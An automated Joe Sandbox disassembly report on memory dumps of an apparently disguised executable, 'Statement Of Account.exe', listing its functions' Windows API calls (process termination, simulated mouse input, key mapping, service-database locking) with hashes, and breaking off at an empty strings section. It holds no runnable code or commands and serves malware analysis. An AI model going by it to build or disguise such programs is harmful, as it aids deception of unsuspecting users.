Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55

Function 00442582 Relevance: 9.1, APIs: 6, Instructions: 104COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00442597

Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3

GetDesktopWindow.USER32 ref: 004425BF
GetWindowRect.USER32(00000000), ref: 004425C6
mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5

Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287

GetCursorPos.USER32(?), ref: 00442624
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6

Function 00441561 Relevance: 9.1, APIs: 6, Instructions: 101windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 0044157D
73A0A570.USER32(00000000,?,?,?,?,?,0045193C,?,?,?,?,000000FF,?,?,00000001,?), ref: 00441585
CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$A570CreateDeleteFontMoveObjectWindow
String ID:
API String ID: 1051003937-0
Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64

Function 00448851 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
EnableWindow.USER32(004A83D8,00000001), ref: 00448C58

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Window$Enable$Show$MessageSend
String ID:
API String ID: 1871949834-0
Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A

Function 00449606 Relevance: 9.1, APIs: 6, Instructions: 91windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0044961A
SendMessageW.USER32 ref: 0044964A

Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC

SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
_wcslen.LIBCMT ref: 004496BA
_wcslen.LIBCMT ref: 004496C7
SendMessageW.USER32(?,00001074,?,?), ref: 004496FD

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$_wcslen$_memset_wcspbrk
String ID:
API String ID: 1624073603-0
Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6

Function 00467E5E Relevance: 9.1, APIs: 6, Instructions: 78COMMON

Download Yara Rule

APIs

__fileno.LIBCMT ref: 00467E7C
__setmode.LIBCMT ref: 00467E85
_fprintf.LIBCMT ref: 00467EDE
OutputDebugStringW.KERNEL32(00000000,?), ref: 00467EF6
__fileno.LIBCMT ref: 00467F1D
__setmode.LIBCMT ref: 00467F26

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __fileno__setmode$DebugOutputString_fprintf
String ID:
API String ID: 3354276064-0
Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF

Function 0041415E Relevance: 9.1, APIs: 6, Instructions: 71threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 0041418F
__calloc_crt.LIBCMT ref: 0041419B
__getptd.LIBCMT ref: 004141A8
CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
__dosmaperr.LIBCMT ref: 00414201

Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23

Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
String ID:
API String ID: 1803633139-0
Opcode ID: 375e199de8660ccece12c72eed21f404e356b520747db73c6127e63f80a42fd2
Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
Opcode Fuzzy Hash: 375e199de8660ccece12c72eed21f404e356b520747db73c6127e63f80a42fd2
Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68

Function 0043609C Relevance: 9.1, APIs: 6, Instructions: 59COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004360B5
_wcslen.LIBCMT ref: 004360CE
_wcstok.LIBCMT ref: 004360E0
_wcslen.LIBCMT ref: 004360F0
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 004360FF
_wcstok.LIBCMT ref: 00436114

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _wcslen$_wcstok$ExtentPoint32Text
String ID:
API String ID: 1814673581-0
Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA

Function 00436272 Relevance: 9.1, APIs: 6, Instructions: 59sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96

Function 004471EC Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC

MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
LineTo.GDI32(?,?,?), ref: 00447227
MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
LineTo.GDI32(?,?,?), ref: 0044723D
EndPath.GDI32(?), ref: 0044724E
StrokePath.GDI32(?), ref: 0044725C

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
String ID:
API String ID: 372113273-0
Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD

Function 00410940 Relevance: 9.0, APIs: 6, Instructions: 49keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA

Function 0044B64F Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
RtlEnterCriticalSection.NTDLL(0042A321), ref: 0044B67B
TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697

Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9

InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
RtlLeaveCriticalSection.NTDLL(0042A321), ref: 0044B6AF

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA

Function 00437118 Relevance: 9.0, APIs: 6, Instructions: 37windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
GetWindowThreadProcessId.USER32(?,?), ref: 00437150
OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
CloseHandle.KERNEL32(00000000), ref: 00437174

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE

Function 0043604B Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\Statement Of Account.exe,00000004), ref: 00436055
LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
GetLastError.KERNEL32 ref: 00436081
CloseServiceHandle.ADVAPI32(00000000), ref: 00436091

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
String ID:
API String ID: 1690418490-0
Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8

Function 00475ACA Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 237comCOMMON

Download Yara Rule

APIs

Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82

CoInitialize.OLE32(00000000), ref: 00475B71
CoCreateInstance.COMBASE(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
CoUninitialize.COMBASE ref: 00475D71

Strings

